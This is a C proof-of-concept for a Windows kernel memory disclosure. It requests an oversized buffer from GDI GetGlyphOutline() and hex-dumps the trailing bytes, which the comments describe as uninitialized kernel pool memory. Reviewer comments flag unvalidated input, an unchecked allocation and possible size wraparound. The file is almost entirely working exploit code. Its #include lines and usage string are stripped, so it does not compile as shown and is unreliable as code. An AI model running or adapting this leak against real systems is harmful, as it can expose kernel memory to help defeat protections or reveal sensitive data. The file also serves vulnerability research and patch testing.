/*
 * Proof-of-concept for a kernel-to-user memory disclosure through the GDI
 * GetGlyphOutline() call: the program requests more output than the glyph
 * outline needs, then prints whatever came back past the outline data.
 *
 * Defensive reading of the code below:
 *   - The user-mode buffer is zero-filled (HEAP_ZERO_MEMORY) before the
 *     second GetGlyphOutline() call, so any non-zero byte printed past
 *     OutlineLength was presumably written by the kernel side of the call
 *     and not by this program.
 *   - The number of trailing bytes to dump is taken from argv[1]; it is the
 *     only input and is not validated (see the notes on strtoul and the
 *     size arithmetic below).
 *
 * NOTE(review): the two #include directives below lost their header names
 * in extraction (the angle-bracketed names were stripped); as written they
 * do not compile.
 */
#include
#include

/*
 * Hex-dump dwBytes bytes of Data to stdout, 16 bytes per row.
 *
 * Each row is: 8-digit hex offset, 16 hex byte cells, then a 16-character
 * ASCII column. Cells past the end of the data are printed as "?? " in the
 * hex column and "." in the ASCII column, so every row has the same width.
 * Only printable ASCII (0x20..0x7e) is echoed; everything else is ".".
 *
 * @param Data     bytes to dump (read only; must hold at least dwBytes bytes)
 * @param dwBytes  number of bytes to dump; 0 prints nothing
 */
VOID PrintHex(PBYTE Data, ULONG dwBytes)
{
    for (ULONG i = 0; i < dwBytes; i += 16) {
        printf("%.8x: ", i);
        /* Hex column: pad the final short row with "?? " rather than spaces. */
        for (ULONG j = 0; j < 16; j++) {
            if (i + j < dwBytes) {
                printf("%.2x ", Data[i + j]);
            } else {
                printf("?? ");
            }
        }
        /* ASCII column: printable range only, so control bytes never reach the terminal. */
        for (ULONG j = 0; j < 16; j++) {
            if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
                printf("%c", Data[i + j]);
            } else {
                printf(".");
            }
        }
        printf("\n");
    }
}

/*
 * Entry point.
 *
 * argv[1] is the number of bytes to request beyond the real outline size
 * (parsed with base 0, so decimal, 0x-hex and leading-0 octal are accepted).
 *
 * Returns 0 on success, 1 on a usage error or when either GetGlyphOutline()
 * call reports GDI_ERROR. GDI handles and the heap buffer are released on
 * every path after they are created.
 */
int main(int argc, char **argv)
{
    if (argc < 2) {
        /* NOTE(review): the argument placeholder after "%s" appears to have
         * been stripped from the usage string during extraction. */
        printf("Usage: %s \n", argv[0]);
        return 1;
    }

    /* NOTE(review): no error checking on strtoul (endptr is NULL, errno is
     * not inspected) and the unsigned long result is narrowed to UINT; a
     * non-numeric or out-of-range argument silently becomes 0 or a truncated
     * value. The value also feeds the size arithmetic below unchecked. */
    UINT NumberOfLeakedBytes = strtoul(argv[1], NULL, 0);

    // Create a memory Device Context, not tied to any window or printer.
    HDC hdc = CreateCompatibleDC(NULL);

    // Create a TrueType font; the 1x1 size keeps the real outline small.
    HFONT hfont = CreateFont(1,                   // nHeight
                             1,                   // nWidth
                             0,                   // nEscapement
                             0,                   // nOrientation
                             FW_DONTCARE,         // fnWeight
                             FALSE,               // fdwItalic
                             FALSE,               // fdwUnderline
                             FALSE,               // fdwStrikeOut
                             ANSI_CHARSET,        // fdwCharSet
                             OUT_DEFAULT_PRECIS,  // fdwOutputPrecision
                             CLIP_DEFAULT_PRECIS, // fdwClipPrecision
                             DEFAULT_QUALITY,     // fdwQuality
                             FF_DONTCARE,         // fdwPitchAndFamily
                             L"Times New Roman");

    // Select the font into the DC so GetGlyphOutline() renders with it.
    SelectObject(hdc, hfont);

    // Size query: with cbBuffer 0 and a NULL buffer, GetGlyphOutline()
    // returns the number of bytes the outline of 'A' needs.
    GLYPHMETRICS gm;
    // Identity transform: each MAT2 element is a FIXED {fract, value} pair.
    MAT2 mat2 = { 0, 1, 0, 0, 0, 0, 0, 1 };
    DWORD OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm, 0, NULL, &mat2);
    if (OutlineLength == GDI_ERROR) {
        printf("[-] GetGlyphOutline#1 failed.\n");
        DeleteObject(hfont);
        DeleteDC(hdc);
        return 1;
    }

    // Allocate the outline plus the extra bytes to be disclosed. The buffer is
    // zero-filled so that anything non-zero past the outline is attributable
    // to the kernel side of the next call rather than to stale heap content.
    // NOTE(review): the HeapAlloc result is not checked for NULL, and
    // OutlineLength + NumberOfLeakedBytes is 32-bit arithmetic that can wrap
    // for a large argument, making the buffer smaller than the size passed
    // to GetGlyphOutline() below.
    PBYTE OutputBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY,
                                          OutlineLength + NumberOfLeakedBytes);

    // Real call, with cbBuffer deliberately larger than the outline needs.
    // The original author describes the trailing bytes as uninitialized pool
    // memory from the kernel; the return value is the outline size actually
    // written, which is where the dump below starts.
    OutlineLength = GetGlyphOutline(hdc, 'A', GGO_BITMAP, &gm,
                                    OutlineLength + NumberOfLeakedBytes,
                                    OutputBuffer, &mat2);
    if (OutlineLength == GDI_ERROR) {
        printf("[-] GetGlyphOutline#2 failed.\n");
        HeapFree(GetProcessHeap(), 0, OutputBuffer);
        DeleteObject(hfont);
        DeleteDC(hdc);
        return 1;
    }

    // Print only the bytes past the genuine outline data.
    PrintHex(&OutputBuffer[OutlineLength], NumberOfLeakedBytes);

    // Free resources.
    HeapFree(GetProcessHeap(), 0, OutputBuffer);
    DeleteObject(hfont);
    DeleteDC(hdc);
    return 0;
}